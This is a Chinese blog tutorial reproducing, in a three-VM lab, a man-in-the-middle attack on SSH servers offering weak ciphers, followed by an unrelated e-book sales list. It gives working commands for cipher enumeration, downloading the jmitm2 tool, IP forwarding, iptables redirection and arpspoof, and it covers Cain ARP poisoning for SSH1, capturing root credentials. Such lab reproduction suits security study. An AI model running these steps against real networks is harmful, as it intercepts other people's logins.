SSH协议弱加密算法漏洞的利用及复现（中间人攻击）

SSH协议弱加密算法漏洞的利用及复现（中间人攻击）

很多服务器或者交换机是存在SSH协议弱加密算法漏洞的，但是该漏洞如何利用呢？最近研究了下此漏洞的相关利用方法，对其整个攻击过程进行了复现。哈哈，本文具体操作步骤适合小白操作，也欢迎大神指正，希望大神对于此漏洞利用提出一些想法或者更好，更便捷的方法，促进交流哈！???

本文主要从SSH1.0和SSH2.0两个版本进行攻击复现，具体操作如下：

一、SSH2.0版本

1.准备环境
Linux虚拟机3台：

• 192.168.136.139：作为SSH服务端
• 192.168.136.143：作为SSH客户端
• 192.168.136.142：作为中间人攻击端

2.详细步骤
首先验证SSH服务端和客户端使用的协议及版本，可用如下命令查看：

nc -VV 192.168.136.139 22
1

nc -VV 192.168.136.143 22
1

我们再使用Nmap探测SSH客户端使用的加密算法：

nmap --script ssh2-enum-algos -sV -p 192.168.136.143
1

可以发现使用算法中包含arcfour, arcfour128, arcfour256等弱加密算法。
在中间人机器（192.168.136.142）上下载jmitm软件并解压：

wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz  #下载
tar xf jmitm2-0.1.0.tar.gz   #解压
1
2

对该工具进行配置，编辑jmitm软件中的server.xml（/jmitm2-0.1.0/conf/server.xml）配置文件：

运行/jmitm2-0.1.0/bin目录下的runm.sh程序，开始监听连接：

./runm.sh
1

依次运行以下命令：

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -i eth0 –t 192.168.136.143（客户端IP） 192.168.136.139（服务端IP）
1
2
3
4

在ssh客户端机器上登录ssh服务端，命令如下：

ssh root@192.168.136.139  -p 22 -2
1

并输入密码toor进行登录。
查看运行的程序runm.sh所输出的内容中，发现成功捕获到用户名（root）/密码（toor）：

至此SSHV2.0版本中间人攻击成功。

二、SSH1.0版本

1.准备环境
两台装有SSH-1.5-OpenSSH_3.8.1p1的Windows虚拟机（169.254.238.43、169.254.227.194）
装有Cain软件的本地物理机作为中间人机器（169.254.141.172）
2.复现步骤
使用软件Cain。
（1）选择虚拟机使用的网卡，如图

（2）选择start sniff，进行嗅探，点击Hosts按钮，扫描出局域网中存活主机。

（3）点击下方“ARP”按钮，添加需要嗅探的两个目标主机IP地址，如图

（4）点击工具栏上“ARP”按钮，开始中间人攻击。

（5）在Windows虚拟机（169.254.238.43）中进行ssh连接，并输入相关用户名密码

ssh 用户名@169.254.227.194  -p 22 -1
1

查看Cain软件，发现arp到用户名和密码，如图：

最后还可以查看ssh连接时所执行过的命令。

备注：
可能会出现SSH密钥不对的情况，这是因为目标已经被链接过的原因，重启机器即可。
这里SSH1.0版本不包含1.9版本，1.9版本的攻击方法是降级攻击，先通过脚本对其进行降级，再进行arp，这里以后有时间再试试? 之前试过几次，没试出来，使用的ettercap嗅探时会报错！???

《算法导论 第三版英文版》_高清中文版

《深度学习入门：基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程：从入门到实践》_高清中文版

《Python科学计算》_高清中文版

《深度学习入门：基于Python的理论与实现》_高清中文版

《深入浅出数据分析》_高清中文版

《Python编程：从入门到实践》_高清中文版

我的第一本算法书

石田保辉 & 宫崎修一

限时 ¥17.5 ¥34.99

深度学习入门：基于 Python 的理论与实现

[日] 斋藤康毅

限时 ¥14.99 ¥29.99

算法图解：像小说一样有趣的算法入门书

Aditya Bhargava

限时 ¥12.5 ¥24.99

Redis 开发与运维

付磊 & 张益军

限时 ¥15 ¥30

算法之美

布莱恩 · 克里斯汀 等

限时 ¥9.99 ¥35.4

Python 编程：从入门到实践

Eric Matthes

限时 ¥21.99 ¥44.5

百面机器学习：算法工程师带你去面试

诸葛越，葫芦娃

限时 ¥26.99 ¥53.99

SQL 进阶教程

MICK

限时 ¥19.99 ¥39.99

TensorFlow 学习指南：深度学习系统构建详解

Tom Hope 等

限时 ¥15 ¥30

Elasticsearch 搜索引擎开发实战

罗刚 & 张子宪

限时 ¥15 ¥30

Python 深度学习

François Chollet

限时 ¥29.99 ¥59.99

Java 并发编程的艺术

方腾飞、魏鹏 等

限时 ¥12.5 ¥25

深度学习：智能时代的核心驱动力量

特伦斯·谢诺夫斯基

限时 ¥29.99 ¥52.8

scikit-learn 机器学习：常用算法原理及编程实战

黄永昌

限时 ¥12.5 ¥25

Java 高并发编程详解：多线程与架构设计

汪文君

限时 ¥22.5 ¥45

Linux 内核分析及应用

陈科

限时 ¥20 ¥40

Spring Cloud 微服务架构开发实战

董超 & 胡炽维

限时 ¥20 ¥40

Python 基础教程（第3版）

Magnus Lie Hetland

限时 ¥24.99 ¥49.99

深度学习：卷积神经网络从入门到精通

李玉鑑

限时 ¥20 ¥40

Python 神经网络编程

塔里克 · 拉希德

限时 ¥24.99 ¥49.99

跟老男孩学 Linux 运维：Web 集群实战

老男孩

限时 ¥24.5 ¥49

Python 高性能编程

Micha Gorelick 等

限时 ¥25.5 ¥50.99

趣学算法

陈小玉

限时 ¥29.99 ¥59.99

Java 9 模块化开发：核心原则与实践

Sander Mak 等

限时 ¥15 ¥30

增长黑客：如何低成本实现爆发式增长

Sean Ellis · 增长黑客之父

限时 ¥14.99 ¥35.99

钱：7步创造终身收入

托尼 · 罗宾斯

限时 ¥19.99 ¥35.4

Go 语言实战

李兆海 · Go 语言早期使用者和推广者

限时 ¥19.99 ¥39.99

代码之外的功夫：程序员精进之路

Gregory T. Brown

限时 ¥12.5 ¥24.99

今日简史：人类命运大议题

尤瓦尔 · 赫拉利

限时 ¥19.99 ¥40.8

RocketMQ 实战与原理解析

杨开元

限时 ¥12.5 ¥25

重新理解创业：一个创业者的途中思考

周航

限时 ¥12.99 ¥34.8

Linux 就该这么学

刘遄

限时 ¥27.99 ¥55.99

Python 高级编程（第2版）

Michał Jaworski & Tarek Ziadé

限时 ¥29.99 ¥59.99

Web 全栈工程师的自我修养

余果 · 腾讯高级 UI 工程师，前端开发组负责人

限时 ¥14.99 ¥29.99

未来世界的幸存者

阮一峰

限时 ¥9.99 ¥19.99

Spring 微服务实战

John Carnell

限时 ¥27.99 ¥55.99

精通 Python 网络爬虫：核心技术、框架与项目实战

韦玮

限时 ¥12.5 ¥25

微服务设计

Sam Newman · ThoughtWorks 技术专家

限时 ¥14.99 ¥29.99

精通 Python 爬虫框架 Scrapy

Dimitrios Kouzis-Loukas

限时 ¥19.99 ¥39.99

刷新：重新发现商业与未来

[美] 萨提亚 · 纳德拉

限时 ¥12.99 ¥34.8

原 则

瑞 · 达利欧（Ray Dalio）

限时 ¥36.99 ¥58.8

基因传

[美] 悉达多 · 穆克吉

限时 ¥19.99 ¥52.8

混乱：如何成为失控时代的掌控者

蒂姆 · 哈福德

限时 ¥16.99 ¥33.6

深入浅出 React 和 Redux

程墨

限时 ¥12.5 ¥25